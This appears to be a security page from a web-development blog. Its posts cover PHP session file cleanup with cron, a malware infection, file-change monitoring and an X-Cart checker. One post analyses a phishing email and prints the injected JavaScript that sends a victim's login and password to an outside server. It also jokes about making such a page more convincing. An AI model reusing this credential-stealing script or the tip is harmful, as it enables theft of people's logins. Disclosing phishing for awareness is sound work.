Category: "Security"

PHP session management and temporary file cleanup

By default, PHP manages sessions during requests. This simplifies installation, because no cron job is required. To allow performance tuning, several configuration settings are allowed to adjust the frequency of the session cleanup checking and execution.

In the default php.ini, there is the following line:

cd /path/to/sessions; find -cmin +24 | xargs rm

Added as a cron job, this can be executed at set intervals (every one to five minutes is probably good), to clear the session file storage directory of files older than 24 minutes. Once implemented the find command can replace the default PHP session cleanup, so those configuration variables can be set to never check for session timeouts. This will speed PHP processing, although it may be imperceptible. It will also improve your control of session length, because the checking and clearing are executed based on time, not PHP requests.

Name any temporary files required to support the session with the session id, plus an extension to indicate the type and use. For example 4365kh2kj54dfg2kjh12.wav, 4365kh2kj54dfg2kjh12.rpt.txt, 4365kh2kj54dfg2kjh12.rpt.html. This allows a second session cleanup script to check for the presence of the session file based on the temporary file’s basename, and delete the temporary files. The second session cleanup script can be included in the main PHP script, or run as a separate cron job, unless the contents of the temporary files could be considered protected data, in which case they should be removed as soon as the session is terminated.

If authentication (logout) is also used to destroy sessions, a mechanism should be provided to clear any related, sensitive, files.

Thank You Malwarebytes

I don’t often “surf the ‘net", visiting unfamiliar sites. Most of my Internet access is in search of LAMP/RIA technical resources and answers, as well as contributing my own through this blog and on the appropriate sites.

Recently, I was checking a search engine for entries related to a site and I clicked on htxx:–aolpsycho.com-d-www.stkc.org (the xxs and -s are there to prevent it from being a real URL). It infected my computer with a nasty virus. Key filenames: brastk.exe, beep.sys, delself.bat, bnokdcme.exe, as well as others and registry corruption. It prevented execution of autoruns.exe, although renaming autoruns to a different name allowed it to run. It put a little red X image in the taskbar, prompting me to click to download ‘Antivirus2009′.

I won’t describe how the files were identified, or any of the other resolution tactics - to avoid assisting the authors. However, if it shows up on your computer, the posted link solved the problem on this machine very nicely.

Sincere thanks to the author and I will purchase a copy of the product.

Have the Server Watch Your Account

This crontab entry will email you a report of all the files modified within the past 24 hours.

find $HOME -mtime 0

Search for files in your home directory which have been modified in the last twenty-four hours. This command works this way because the time since each file was last modified is divided by 24 hours and any remainder is discarded. That means that to match -mtime 0, a file will have to have a modification in the past which is less than 24 hours ago.

http://linux.about.com/od/commands/l/blcmdl5_crontab.htm

Describes how to set up a cron job, so the command will execute periodically and email you the results.

MAILTO=me

5 0 * * * find $HOME/public_html -mtime 0

This simple command will let you know when files have been added to your server. You may want to disallow some files or directories.

Nifty Phishing Approach

*** Scam was stopped ***

This phishing attempt was delivered through email, with the above link - claiming maintenance was scheduled. Has some nice text, doesn’t tell you to login, but provides a link so you can. :)

It looks great.

The code below is the phishing code, it catches the login validation and sends it to the sys82.net server, where it can capture your data.


var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
document.body.appendChild(script);
return false;

The page content is probably copied live from the real site, with the javascript added in by the phishermen.

Page is slow. Would be good to take a screenshot and use that as a background while the real page loads. :yes:

Free X-Cart Installation Checker

The checker is an HTML file that will allow you to enter the URL for your cart, the directory you have installed it in, then offer you links that you can click to see if the server has been properly configured to protect the files.

This tool is valuable for the following:

  • Engineering, security, and QA - to ensure the application was properly installed and protected
  • eCommerce site owners - to check the work of your web development company
  • Credit card gateway companies - to check the security of the application installed for requesting clients
  • Security - to identify risk areas for applications
  • Hosting companites - to check client accounts after security problems

You do not have to install it on a server, you can run it from the desktop. It does not require any server access beyond the browser. No passwords, no database access, no FTP, no SSH. It doesn’t use AJAX, it won’t log into your cart. It won’t analyze the results.

It is a very simple, free tool that runs under IE.

If you would like a copy, you must either have a live cart running, or be part of a web development company. Use an email with the domain name of the cart, or your web dev company, and I will send you the HTML - in a text file. Requests can be made through the contact form on this blog.

Please don’t use gmail, hotmail, yahoo or other free accounts. You will not receive any response.

The reason the page isn’t posted for public access it that it would make it very easy for people to quickly check a cart’s vulnerabilities. Limiting the distribution is for security. This is not an attempt to collect email addresses or domains that are running X-Cart. I know how to find carts. :)